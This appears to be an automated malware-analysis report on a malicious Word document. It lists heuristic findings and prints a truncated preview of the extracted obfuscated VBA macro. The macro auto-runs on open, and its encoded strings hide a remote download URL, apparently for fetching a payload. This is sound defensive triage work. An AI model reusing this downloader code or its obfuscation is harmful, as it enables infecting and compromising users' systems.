MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of a Document_Open macro and high-severity heuristics for CreateObject and CallByName indicate that the VBA code is designed to execute automatically upon opening the document. The obfuscated nature of the VBA script prevents a detailed analysis of its exact function, but it is highly probable that it attempts to download and execute a secondary payload. The benign URLs extracted do not provide further clues.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14718 bytes |
SHA-256: 6c4846d8598ef1f82849473010bc29d96a31053ca81d94dd39b7770633e27071 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fvKAaq(ByVal RjHAYZ As String, ByVal plZMuVXW As String) As Integer
CIkPvETJFUk
JWAJBH = 6891
JFWxcIjPC 4165
jqPQzD 7578, "ytiGjsd6ekKE"
If GDiCp Then
TGmhFfRyvckn "KPKE2HeClOLt", True, "HRt68o9ZNQ"
JhNaBG "AMfRcApjwJrG0bt", True
NQRybJUhZKprF
Else
lFuWfXpMg 1146
End If
fvKAaq = 5291
End Function
Private Sub OicfHgZKVWVjfS(ByVal ROjtSfe As String, ByVal zojJPqZNmTLS As Integer)
wjOhKnl "iBqpXyVXVHZaR7y", 5222, True
sQZNJVCfHZN
naHcc 7063
End Sub
Private Function RaRKlSjcuok() As String
If VlDpzxjXRiD Then
ZIyxebwODKgm
Else
aeDGRAWOKLFzkM 2523
End If
RaRKlSjcuok = "TTwrJXZ1Y4"
End Function
Private Sub Document_Open()
Dim aOwVHlBlpxax As String
AtovKyQBvllrVa = 5132
iurSDPGCtkdXP.ONzArApHFkICm
End Sub
Private Function LhplDdFLj(ByVal SqtOT As Integer, ByVal BSRdtj As String) As Boolean
AOYJU 564, 1218, "SlRtSQMod8yKy"
JnHbvIhGtMNp = 5855
CRTrffoKEvF 1901, "CrLjGfjfnt"
roQQLb 7473
AHDmJRufY 238, "ewqCg0U9eI46", "uVr1BazvfhaP"
LhplDdFLj = False
End Function
Attribute VB_Name = "iurSDPGCtkdXP"
Private Sub enIVozeeGiem()
Dim jKPQSEuutha As Integer
IsQDtkacJsON = 7110
iJueTzjdd ejtrxReBIBUyR.ZtFAYECi, 1503, tMMYmHU
ejtrxReBIBUyR.MnHBqswijt ejtrxReBIBUyR.ZtFAYECi
End Sub
Public Sub ONzArApHFkICm()
oucjzcinmWTVGi = 4891
On Error GoTo GIEifT
IpEfKV.sgRKorfj
IpEfKV.NwXpZWHfDnf
enIVozeeGiem
Exit Sub
GIEifT:
End Sub
Private Sub iJueTzjdd(ByVal dbhXZ As String, ByVal CaDod As Integer, ByVal GPbwXSXU As String)
Dim qCKszCQwGnH As Integer
Set uSunG = pGwrUXKyr.IKIuG("2g9c1xwaIKK", GPbwXSXU, "fS4dLFhwjQc3")
pGwrUXKyr.zFeXXjpDotNa uSunG, qPKtf.LjgMgzvQpOMhN("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
ejtrxReBIBUyR.unvIXAYLSYMLu dbhXZ, uQHXwgmR.PiVneV(uSunG, qPKtf.LjgMgzvQpOMhN("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function YKvUmnO(ByVal kOehqnhaZspbkF As String, ByVal GxFzAhlNIxn As String) As Object
Dim IniMFqJthap As String
Dim qYToCbBHhTlJs As String
Set YKvUmnO = tgaCE(CreateObject(GxFzAhlNIxn), False, False)
End Function
Private Function tgaCE(ByVal JHplXpXB As Object, ByVal gvzTxyb As Boolean, ByVal lcwvfCmNuqeIxb As Boolean) As Object
Set tgaCE = JHplXpXB
End Function
Private Function tMMYmHU() As String
tMMYmHU = qPKtf.LjgMgzvQpOMhN("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "qPKtf"
Public Function LjgMgzvQpOMhN(ByVal fqtdUgRdJ As String, ByVal rAVKHfdcXpQ As String) As String
Dim YFCNPGqz As Boolean
For TgYIwO = HcjLBkiEARGkcz To etdjJMlUgCJJp.ypTiE("JiZetYgNzqIM", fqtdUgRdJ)
LjgMgzvQpOMhN = etdjJMlUgCJJp.juNGoc("MT7mNDYhCPs9", LjgMgzvQpOMhN, 8054, ERNBjA(rAVKHfdcXpQ, etdjJMlUgCJJp.LpaKnDK(TgYIwO, "jQRmVT0yjlnJ5vB", fqtdUgRdJ)))
Next
End Function
Private Sub tKyFLY(ByVal tgAspzOCCPRc As Boolean)
YeOUSKbjsQSeHv = "LmzuBVC6d"
uMlYtSUHd 4633, "qRTudaFcn"
cdMOlSvIwbZ "jelylouIu", "SqZR0uDkvu9k0As", "7PbaXEF5x"
rFqbKCDfWQTRCa = False
CryJBQjzIjjAL "E8gfTrZgIm1un7"
gfBXxUaJWrIf 7882
cGOKdTFyCZjE = 779
NscRhRyJBDv
End Sub
Private Sub biLps()
If xjhEYtWTu Then
ByxHwGYit
MoFuIxgPJ = "2Xr8Zmcrck6L"
End If
End Sub
Private Function ERNBjA(ByVal JqwChEMzvTVegT As String, ByVal HXsgjVgtmR As String) As String
Dim ioylxn As Integer
Dim fiPHulhgAVDg As String
If Not etdjJMlUgCJJp.yqhjXuyPzPe(HXsgjVgtmR, "eGPQegGkvXuCkf", JqwChEMzvTVegT, 4638) Then
ERNBjA = HXsgjVgtmR
End If
End Function
Private Function HcjLBkiEARGkcz() As Integer
LTleDTcEW = "YRiN3zRorJJqyMb"
HcjLBkiEARGkcz = 1
End Function
Attribute VB_Name = "pGwrUXKyr"
Private Function VJwqlnCkCZsZ() As String
FaVDWvMiFb
uCKxyjpW "HsmZfMX2tfHRJ", "Toaxo3tHExKrkJ", 1389
LCjkyELUitfwTn
qWyHYZHtbegHJD 2198, 3506, 5073
JYBeU
VJwqlnCkCZsZ = "ay2916dWNOdif52"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.